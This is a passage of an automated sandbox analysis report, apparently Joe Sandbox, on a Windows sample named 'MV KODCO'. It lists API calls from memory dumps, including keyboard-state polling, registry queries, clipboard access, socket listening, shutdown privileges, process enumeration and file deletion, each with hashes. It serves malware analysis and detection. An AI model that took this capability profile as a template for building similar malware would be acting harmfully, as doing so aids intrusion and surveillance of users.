                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00631BE7
                                                          • _wcscmp.LIBCMT ref: 00631C0E
                                                          • _wcscmp.LIBCMT ref: 00631C25
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00631C37
                                                          • SetCurrentDirectoryW.KERNEL32(006939FC), ref: 00631C55
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00631C5F
                                                          • FindClose.KERNEL32(00000000), ref: 00631C6C
                                                          • FindClose.KERNEL32(00000000), ref: 00631C7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: cb81113fe241a97486088123529e0f9175f9401f369f1b798f8c739009ff8e83
                                                          • Instruction ID: 266420916ee339e2ad5d91e78732209a222a18e7bd9071604d68dbb31bab74d7
                                                          • Opcode Fuzzy Hash: cb81113fe241a97486088123529e0f9175f9401f369f1b798f8c739009ff8e83
                                                          • Instruction Fuzzy Hash: BB31E831A402196FCF149FB0DC49ADEB7AEAF47310F104155F911E7190EBB4DF458AA4
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00631CAB
                                                          • _wcscmp.LIBCMT ref: 00631CC0
                                                          • _wcscmp.LIBCMT ref: 00631CD7
                                                            • Part of subcall function 00626BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00626BEF
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00631D06
                                                          • FindClose.KERNEL32(00000000), ref: 00631D11
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00631D2D
                                                          • _wcscmp.LIBCMT ref: 00631D54
                                                          • _wcscmp.LIBCMT ref: 00631D6B
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00631D7D
                                                          • SetCurrentDirectoryW.KERNEL32(006939FC), ref: 00631D9B
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00631DA5
                                                          • FindClose.KERNEL32(00000000), ref: 00631DB2
                                                          • FindClose.KERNEL32(00000000), ref: 00631DC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: 2b432a879c3fa690e61142bed8c1671c8f2e4a7cb82ae503db29919400f30e19
                                                          • Instruction ID: 130a7b4ae29856365f4b5f121c4b76b5c3bd089ec302671ee93711dfb783bafe
                                                          • Opcode Fuzzy Hash: 2b432a879c3fa690e61142bed8c1671c8f2e4a7cb82ae503db29919400f30e19
                                                          • Instruction Fuzzy Hash: DF31E831A006196BCF15AFA0DC09ADE77AFAF47320F104555F811AB2D0EB70DF458B94
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _memset
                                                          • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                          • API String ID: 2102423945-2023335898
                                                          • Opcode ID: 82976d907a2d857aa761d64cd5a15ef8f043c5f1af3f0659b34cb1c0bee2b6ce
                                                          • Instruction ID: 761fc6f96a6c0a075d6283cfb8de5f90191a54985a3b07821adf7e337fd8d4aa
                                                          • Opcode Fuzzy Hash: 82976d907a2d857aa761d64cd5a15ef8f043c5f1af3f0659b34cb1c0bee2b6ce
                                                          • Instruction Fuzzy Hash: FA82C271D04259DBDF28CF95C8806EDBBB2FF48310F2585AAD899AB351E7709D85CB80
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 006309DF
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 006309EF
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006309FB
                                                          • __wsplitpath.LIBCMT ref: 00630A59
                                                          • _wcscat.LIBCMT ref: 00630A71
                                                          • _wcscat.LIBCMT ref: 00630A83
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00630A98
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00630AAC
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00630ADE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00630AFF
                                                          • _wcscpy.LIBCMT ref: 00630B0B
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00630B4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: 44e1914cfafb6055d0feb7075a540ec684c439c74b6c69fe3adf5696956a2bad
                                                          • Instruction ID: 2cfd630e2eca99b8204f3df9e4625710169d93bef69365726dc85bc8197a2027
                                                          • Opcode Fuzzy Hash: 44e1914cfafb6055d0feb7075a540ec684c439c74b6c69fe3adf5696956a2bad
                                                          • Instruction Fuzzy Hash: DA6179765043459FD714EF60C854AAEB3EAFF89310F04491EF989C7292DB31EA09CB92
                                                          APIs
                                                            • Part of subcall function 0061ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0061ABD7
                                                            • Part of subcall function 0061ABBB: GetLastError.KERNEL32(?,0061A69F,?,?,?), ref: 0061ABE1
                                                            • Part of subcall function 0061ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0061A69F,?,?,?), ref: 0061ABF0
                                                            • Part of subcall function 0061ABBB: HeapAlloc.KERNEL32(00000000,?,0061A69F,?,?,?), ref: 0061ABF7
                                                            • Part of subcall function 0061ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0061AC0E
                                                            • Part of subcall function 0061AC56: GetProcessHeap.KERNEL32(00000008,0061A6B5,00000000,00000000,?,0061A6B5,?), ref: 0061AC62
                                                            • Part of subcall function 0061AC56: HeapAlloc.KERNEL32(00000000,?,0061A6B5,?), ref: 0061AC69
                                                            • Part of subcall function 0061AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0061A6B5,?), ref: 0061AC7A
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0061A6D0
                                                          • _memset.LIBCMT ref: 0061A6E5
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0061A704
                                                          • GetLengthSid.ADVAPI32(?), ref: 0061A715
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0061A752
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0061A76E
                                                          • GetLengthSid.ADVAPI32(?), ref: 0061A78B
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0061A79A
                                                          • HeapAlloc.KERNEL32(00000000), ref: 0061A7A1
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0061A7C2
                                                          • CopySid.ADVAPI32(00000000), ref: 0061A7C9
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0061A7FA
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0061A820
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0061A834
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 181192d04bf1dd437c27ea258fa53dc703600af8b155dc60ff874a2027784282
                                                          • Instruction ID: 1b89716030114c8b7648ff54b86d3f07b12ca5b5582d943de877532a3f3f9bee
                                                          • Opcode Fuzzy Hash: 181192d04bf1dd437c27ea258fa53dc703600af8b155dc60ff874a2027784282
                                                          • Instruction Fuzzy Hash: E0514C71A01209AFDF10DFA5DC44EEEBBBAFF04310F088129F911A7291DB749A46CB61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: h$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$hhh h
                                                          • API String ID: 0-523946728
                                                          • Opcode ID: 358015ba06584c8e940274cc883b9db5f02be93e367d19aa309579142d01fa23
                                                          • Instruction ID: 00bc7200f362cc32f5ef562b888cb86add93a519d55f7337231e4c94d23a683f
                                                          • Opcode Fuzzy Hash: 358015ba06584c8e940274cc883b9db5f02be93e367d19aa309579142d01fa23
                                                          • Instruction Fuzzy Hash: 71728071E0426A9BDF18CF59C8907EEBBB6BF48310F14456AE845EB381DB709E41DB90
                                                          APIs
                                                            • Part of subcall function 00626EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00625FA6,?), ref: 00626ED8
                                                            • Part of subcall function 006272CB: GetFileAttributesW.KERNEL32(?,00626019), ref: 006272CC
                                                          • _wcscat.LIBCMT ref: 00626441
                                                          • __wsplitpath.LIBCMT ref: 0062645F
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00626474
                                                          • _wcscpy.LIBCMT ref: 006264A3
                                                          • _wcscat.LIBCMT ref: 006264B8
                                                          • _wcscat.LIBCMT ref: 006264CA
                                                          • DeleteFileW.KERNEL32(?), ref: 006264DA
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 006264EB
                                                          • FindClose.KERNEL32(00000000), ref: 00626506
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                          • String ID: \*.*
                                                          • API String ID: 2643075503-1173974218
                                                          • Opcode ID: 52149c38fd097781587561d23cb7cbb1a14c2d91bd7659d97db5113ae4dc0a9b
                                                          • Instruction ID: af9ec50b2cdf4994ea1ad6cf907d11cc53ba41e9caa6f3c03047be4fb5c2ebea
                                                          • Opcode Fuzzy Hash: 52149c38fd097781587561d23cb7cbb1a14c2d91bd7659d97db5113ae4dc0a9b
                                                          • Instruction Fuzzy Hash: E131C5B24483849AD721EBA4DC85EDBB7DDAF56300F00491EF5D8C3181EA35D60D8BA7
                                                          APIs
                                                            • Part of subcall function 00643C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00642BB5,?,?), ref: 00643C1D
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0064328E
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0064332D
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006433C5
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00643604
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00643611
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: c800fef836e27cf8650bc12d82af30a2d57b4698206ba88bf9ca68380de943d5
                                                          • Instruction ID: 07a89af9e89aee7d764aa502febf17be7f71bdd0229a0ceadee2ee3973934d83
                                                          • Opcode Fuzzy Hash: c800fef836e27cf8650bc12d82af30a2d57b4698206ba88bf9ca68380de943d5
                                                          • Instruction Fuzzy Hash: 0FE14B71604211AFCB14DF29C995E6ABBEAFF88314B04886DF58ADB361DB30ED05CB51
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00622B5F
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00622BE0
                                                          • GetKeyState.USER32(000000A0), ref: 00622BFB
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00622C15
                                                          • GetKeyState.USER32(000000A1), ref: 00622C2A
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00622C42
                                                          • GetKeyState.USER32(00000011), ref: 00622C54
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00622C6C
                                                          • GetKeyState.USER32(00000012), ref: 00622C7E
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00622C96
                                                          • GetKeyState.USER32(0000005B), ref: 00622CA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 22d11aab105a691e01c9260ad1b592e794ea6515a0de485f7cc74c7f505aee1d
                                                          • Instruction ID: 96bdc3bbc9d09068d2410fbb7a69542805ef66fb5fcbb41654176ee3d61046b7
                                                          • Opcode Fuzzy Hash: 22d11aab105a691e01c9260ad1b592e794ea6515a0de485f7cc74c7f505aee1d
                                                          • Instruction Fuzzy Hash: 9041C430B04FDB79FF719B60A8243F9BEA26B11358F048059D9C6567C1DBA499C4CFA2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 8479b4069c8f979a6bfa32740106b759904d0589880cda8818fa520051f0aff5
                                                          • Instruction ID: 8d65e56353a15e87763ab12d949c3387e31ab1a913da905e90a5c727572b193f
                                                          • Opcode Fuzzy Hash: 8479b4069c8f979a6bfa32740106b759904d0589880cda8818fa520051f0aff5
                                                          • Instruction Fuzzy Hash: 2021AE31700520AFDB11AF65DD59B6EB7AAFF48710F049019FA0ADB2A1CBB4ED018F94
                                                          APIs
                                                            • Part of subcall function 00619ABF: CLSIDFromProgID.OLE32 ref: 00619ADC
                                                            • Part of subcall function 00619ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00619AF7
                                                            • Part of subcall function 00619ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00619B05
                                                            • Part of subcall function 00619ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00619B15
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0063C235
                                                          • _memset.LIBCMT ref: 0063C242
                                                          • _memset.LIBCMT ref: 0063C360
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0063C38C
                                                          • CoTaskMemFree.OLE32(?), ref: 0063C397
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 0063C3E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: f2c326548d28f2b7e0ff58491c531707406c30f24178c6e45e896e15ea5a23cc
                                                          • Instruction ID: 0d7360d4d29aeae234ef7282a6aa6a878b79b4b9bb70d2f34973d1a8be9c976f
                                                          • Opcode Fuzzy Hash: f2c326548d28f2b7e0ff58491c531707406c30f24178c6e45e896e15ea5a23cc
                                                          • Instruction Fuzzy Hash: 37913971D00229ABDB10DF95DC95EEEBBBAEF48310F10811AF515B7281DB709A45CFA0
                                                          APIs
                                                            • Part of subcall function 0061B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0061B180
                                                            • Part of subcall function 0061B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0061B1AD
                                                            • Part of subcall function 0061B134: GetLastError.KERNEL32 ref: 0061B1BA
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00627A0F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: 469e6b0ee997c3244910c6772e62b8c0af30a7bdafe8da1c78f62d7b4ae866a8
                                                          • Instruction ID: 220f3621ff463aeb6401028e69099cb44ef0595f17b587f06e98254007920d3d
                                                          • Opcode Fuzzy Hash: 469e6b0ee997c3244910c6772e62b8c0af30a7bdafe8da1c78f62d7b4ae866a8
                                                          • Instruction Fuzzy Hash: 4F01F7717696326AF7285668AC5BFFF325F9B00360F141428FD43A21D2DAA05E0199A4
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00638CA8
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00638CB7
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00638CD3
                                                          • listen.WSOCK32(00000000,00000005), ref: 00638CE2
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00638CFC
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00638D10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: f7256e38a52d0824aaae1aed2126cee9a9238052a29a254e0df68ac139bb13a8
                                                          • Instruction ID: 95f003f5a0dbbb6f4c3d8a19df0cbc60a68d1ad9c244272e6277d175b1e6d516
                                                          • Opcode Fuzzy Hash: f7256e38a52d0824aaae1aed2126cee9a9238052a29a254e0df68ac139bb13a8
                                                          • Instruction Fuzzy Hash: 1F21B4356006019FCB14EF64D949BAE7BAAFF88720F105158F956A73D2CB70AD418BA1
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00626554
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00626564
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00626583
                                                          • __wsplitpath.LIBCMT ref: 006265A7
                                                          • _wcscat.LIBCMT ref: 006265BA
                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 006265F9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                          • String ID:
                                                          • API String ID: 1605983538-0
                                                          • Opcode ID: 9ea0c95e012cca18e7d4e6e7c27f125b776569b4bd23d24119ed7beb5876ed6c
                                                          • Instruction ID: efa4ef19f89ccac5733ff111d2643bc6985ea407b234edbace7db0cce6107d26
                                                          • Opcode Fuzzy Hash: 9ea0c95e012cca18e7d4e6e7c27f125b776569b4bd23d24119ed7beb5876ed6c
